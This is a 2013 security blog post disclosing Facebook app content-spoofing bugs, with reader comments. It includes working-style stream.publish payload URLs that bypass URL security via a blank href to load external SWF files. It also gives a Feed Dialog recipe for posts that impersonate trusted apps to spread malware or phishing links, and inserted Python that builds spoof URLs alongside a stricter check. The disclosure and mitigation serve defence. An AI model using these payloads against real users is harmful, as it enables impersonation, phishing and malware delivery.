16 May 2013
Category: Uncategorized

Hi,

For this post, I’ll be talking about how I spoof the content of any app on Facebook. I’m also going to talk about a few of the “unfix” bugs found in Facebook (some of which still work). These bugs give attackers a way to inject external links or images into a wall (newsfeed) post so that it appears to come from a trustworthy app like Soundcloud or Candy Crush, among the most popular Facebook games and apps.

But, what exactly does “spoofing app content” entail?

It basically means that an attacker can post content that appears to come from a trusted application onto the wall or newsfeed of a victim.

For example:

You can find content from Saavn, Candy Crush, Spotify, Pinterest, or really any other application on Facebook.

Facebook has a somewhat interesting publishing method called stream.publish (http://fbdevwiki.com/wiki/FB.ui#method:_.27stream.publish.27).

This essentially lets a Facebook application post to your wall, with stream attachments (media, links and action links) included in the post.

The Stream Publish Dialog will look like the following:

https://www.facebook.com/dialog/stream.publish?app_id=xxxx&redirect_uri=http://www.facebook.com/&action_links=&attachment=%7B%27media%27:%20[%7B%27type%27:%20%27flash%27,%27swfsrc%27:%27http://files.nirgoldshlager.com/goldshlager2.swf%27,%27imgsrc%27:%27http://www.vectorstock.com/i/composite/41,30/hacked-pc-vector-194130.jpg%27,%27width%27:%27130%27,%27height%27:%27%20130%27,%27expanded_width%27:%27500%27,%27expanded_%20height%27:%27500%27%7D],%27name%27:%27xxxx%27,%27caption%27:%27xxxx%20Application%27,%27properties%27:%7B%27xxx%27:%7B%27text%27:%27Download%20xxx%27,%27href%27:%27http://nirgoldshlager.com%27%7D%7D%7D

 

This dialog contains a few noteworthy parameters:

1. app_id

2. attachment (swfsr,imgsrc,href)

 

The attacker must first provide the app_id value for the victim application (Saavn, Spotify, etc.).

 

For example:

Saavn’s app_id is: app_id = 126986924002057

At this point, the attacker must supply attachment parameters such as swfsrc and imgsrc.

What happens if the attacker uses the swfsrc parameter to load swf files from an external website (in this case, nirgoldshlager.com)? Will Facebook permit this? It turns out that Facebook’s default is to allow loading external swf files from literally any domain through the swfsrc parameter. There is a feature called Stream post URL security that is meant to ward off exactly this kind of attack. In theory, an app developer who enables this protection in their Facebook Developer account will not be exposed to attacks of this nature, because attackers can no longer load external swf files.

 

[Screenshot: the Stream post URL security setting]

Even so, I discovered a way to get past this protection by blanking out the href parameter (href=).

 

For example, a blocked request:

[Screenshot: blocked request and blocked content]

Facebook rightfully blocks my request: it validates the original domain (xxx.com) of the owner app (xxx) using the href parameter

(href”:”http://xxx.com/onlyxxxdotcomdomainallow”).

To bypass it, I used a blank value in the href parameter:

(href”:””)

With the href check sidestepped, I used the imgsrc and swfsrc parameters to load swf files from an external domain (http://xxx.com).

 

 

 

bypassswf

 

 

PoC Bypass (Fixed By Facebook Security in 2012):

https://www.facebook.com/dialog/stream.publish?access_token=&api_key=211795388914496&app_id=211795388914496&attachment=%7B%22name%22%3A%22NirGoldshlager%22%2C%22caption%22%3A%22%7B*actor*%7D%20Goldshlager%22%2C%22description%22%3A%22%22%2C%22href%22%3A%22%22%2C%22media%22%3A%5B%7B%22type%22%3A%22flash%22%2C%22height%22%3A%22300%22%2C%22imgsrc%22%3A%22http%3A%2F%2Fwww.it-networks.org/wp-content/uploads/2012/01/hacked.jpg%22%2C%22expanded_width%22%3A%22900%22%2C%22expanded_height%22%3A%22400%22%2C%22swfsrc%22%3A%22http://nirgoldshlager.site50.net/goldshlager.swf%23media_id%3Djl95eFLM%26source%3Dsaavn%26title%3DBuddhi%20Do%20Bhagwaan%20%28Charlie%26%2339%3Bs%20Song%29%26album%3DPlayers%26thumb%3Dhttp%3A%2F%2F%26more_link%3Dhttp%3A%2F%2F%2Fp%2Fsong%2Fhindi%2Fplayers%2Fbuddhi%2Bdo%2Bbhagwaan%2FGgRSBBF2e34%26demoStartTime%3D0%26demoDuration%3D30%26url%3D%253D%22%7D%5D%7D&display=popup&locale=en_US&message=&next=https://apps.facebook.com/goldshlagerdemo/&sdk=joey&user_message_prompt=
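As an added example (not code from this post or from Facebook), the following Python models the check the post describes and its hardened counterpart: the weak version validates only href, so a blank href slips through while swfsrc and imgsrc point anywhere; the strict version requires every URL-bearing attachment field to be non-empty and on the owner app’s registered domain. The owner domain, the attacker host and APP_ID_PLACEHOLDER are constructed placeholders.

```python
import json
from urllib.parse import parse_qs, quote, urlparse

# Constructed example: the domain the owner app registered for Stream post URL
# security (hypothetical app; "attacker.example" below is likewise made up).
APP_DOMAINS = {"ownerapp.example"}
# Attachment media sub-fields that carry a URL Facebook renders or loads.
MEDIA_URL_FIELDS = ("swfsrc", "imgsrc", "src", "href")

def host_allowed(url, allowed):
    """True only for a non-empty URL whose host is (a subdomain of) an allowed domain."""
    if not url:
        return False  # blank or missing is a failure, not "nothing to check"
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in allowed)

def parse_attachment(dialog_url):
    """Extract the JSON 'attachment' parameter from a stream.publish dialog URL."""
    qs = parse_qs(urlparse(dialog_url).query, keep_blank_values=True)
    return json.loads(qs["attachment"][0])

def weak_check(attachment, allowed):
    """Model of the check the post describes: only href is validated, so an
    empty href passes and swfsrc/imgsrc are never examined."""
    href = attachment.get("href", "")
    return href == "" or host_allowed(href, allowed)

def strict_check(attachment, allowed):
    """Hardened check: name every URL field that is blank or off-domain.
    An empty list means the attachment is clean."""
    bad = []
    if not host_allowed(attachment.get("href", ""), allowed):
        bad.append("href")
    for i, item in enumerate(attachment.get("media", [])):
        for f in MEDIA_URL_FIELDS:
            if f in item and not host_allowed(item[f], allowed):
                bad.append(f"media[{i}].{f}")
    for key, prop in attachment.get("properties", {}).items():  # action links
        if isinstance(prop, dict) and not host_allowed(prop.get("href", ""), allowed):
            bad.append(f"properties.{key}.href")
    return bad

def dialog_url(attachment):
    """Build a dialog URL of the shape shown above (app_id is a placeholder)."""
    return ("https://www.facebook.com/dialog/stream.publish?app_id=APP_ID_PLACEHOLDER"
            "&attachment=" + quote(json.dumps(attachment), safe=""))

# Constructed bypass payload: blank href, flash media from an attacker-controlled host.
BYPASS_URL = dialog_url({"name": "xxxx", "href": "", "media": [{"type": "flash",
    "swfsrc": "http://attacker.example/x.swf", "imgsrc": "http://attacker.example/x.jpg"}]})
```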

 

PoC Video (Fixed in 2012):

This bug allowed me to load any number of swf files from any domain.

Thus, every time a victim visits my wall post, they see spoofed content attributed to a Facebook application they generally trust. Clicking the link in the post makes an swf file from the external website execute on their client machine.

In the following video example, I open a new tab on the victim’s client that redirects them to my website (nirgoldshlager.com) by means of an external swf file.

 

 

Bug 2 (The “Unfix” Content Spoofing Bug)

Now let’s go over the “unfix” content spoofing Facebook app bug.

Facebook retired the stream.publish option in 2013 in favour of the Feed Dialog (https://developers.facebook.com/docs/reference/dialogs/feed/) for publishing app activity.

In this Feed Dialog, we’ll use a few parameters to perform the content spoofing app bug.

 

 

[Screenshot: Feed Dialog]

1. Link parameter: With this parameter, we include our malicious external link (virus exe file, 0days, phishing site, or any other malicious link).

2. Picture parameter: This parameter is only useful if we want to spoof the content with an image. The image only displays correctly in our Wall post; it does not display correctly in the newsfeed, so it is relevant only to wall post app spoofing.

3. Caption parameter: This parameter lets an attacker choose which website the content appears to come from, for example:

Facebook.com

Zynga.com

Ownerappdomain.com

4. Name parameter: This parameter produces the title we want. Whenever the victim clicks that title, they are taken to our malicious website.
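As an added example that is not part of the original post, the following Python flags the Feed Dialog inconsistencies described in the list above (a domain-like caption naming a site the link does not actually go to, and a link or picture hosted outside the owner app’s domains) and shows the mitigation of rendering the link’s real host instead of the caption as the source line. The owner domain, the attacker host and APP_ID_PLACEHOLDER are constructed values.

```python
import re
from urllib.parse import parse_qs, urlencode, urlparse

# A caption only "claims an origin" when it has the shape of a host name.
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")

def feed_params(dialog_url):
    """Flatten a Feed Dialog query string into {link, picture, caption, name, ...}."""
    qs = parse_qs(urlparse(dialog_url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}

def host_of(url):
    return (urlparse(url).hostname or "").lower()

def same_site(a, b):
    """Host a and host b are equal or one is a subdomain of the other."""
    return bool(a) and bool(b) and (a == b or a.endswith("." + b) or b.endswith("." + a))

def spoof_indicators(params, app_domains):
    """What a renderer should flag before showing the post: the link (the real
    click destination) or picture hosted outside the owner app's registered
    domains, and a domain-like caption naming a site the link does not go to.
    app_domains is the owner's allow-list (an assumption, not a Facebook API)."""
    findings = []
    link_host = host_of(params.get("link", ""))
    if not any(same_site(link_host, d) for d in app_domains):
        findings.append(f"link goes off-domain: {link_host or '<empty>'}")
    pic_host = host_of(params.get("picture", ""))
    if pic_host and not any(same_site(pic_host, d) for d in app_domains):
        findings.append(f"picture loaded off-domain: {pic_host}")
    caption = params.get("caption", "").strip().lower()
    if DOMAIN_RE.match(caption) and not same_site(caption, link_host):
        findings.append(f"caption claims {caption} but link goes to {link_host or '<empty>'}")
    return findings

def safe_source_line(params):
    """Mitigation: derive the displayed source from the link's real host,
    never from the attacker-controlled caption."""
    return host_of(params.get("link", "")) or "<no link>"

# Constructed example of the post described above: trusted-looking caption and
# title, while link and picture point at an attacker-controlled host.
SPOOF_URL = "https://www.facebook.com/dialog/feed?" + urlencode({
    "app_id": "APP_ID_PLACEHOLDER",
    "link": "http://attacker.example/download.exe",
    "picture": "http://attacker.example/cover.jpg",
    "caption": "ownerapp.example",
    "name": "Listen to the new track",
})
```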

 

PoC Video:

 

 

Solution:

To prevent content spoofing on your app, set Stream post URL security = Enabled in the App settings (developers.facebook.com).

Bonus Video (Advanced Spoofing Apps Links, Fixed By Facebook Security 2012):

 

 

 

And?

Use Stream post URL security=Enabled.

 

 

 


8 responses on “Spoof Facebook Apps”, Attack / Solution for Owner App

  1. Allan says:

    Sir, can you please help me to secure my website..
    Thanks, by the way the App Spoofing is very nice, I try it!
    My friends loving it :D

  2. Kunal says:

    Awesome ! You are great. You are my hero and my idol !!

  3. dufferzafar says:

    How can I find the appid of other apps?
    I mean, you’ve mentioned some of those, but how do I get the appid of any app, for example the Facebook mobile app……

  4. [...] For this post, I’ll be talking about how I spoof the content of any app on Facebook. I’m also going to talk about a few of the “unfix”: bug found in Facebook (some of which still work). These bugs provide attackers with avenues to inject external links or images to a wall (newsfeed) post that appear to come from trustworthy apps like Soundcloud or Candy Crush,  [...]

  5. [...] allow a hacker to spoof the content of any Facebook app easily.   Nir Goldshlager from Break Security today exposed another major flaw that allows hacker to wall post spoofed messages from trusted [...]


  7. [...] Goldshlager from Break Security today exposed another major flaw that allows hacker to wall post spoofed messages from trusted [...]
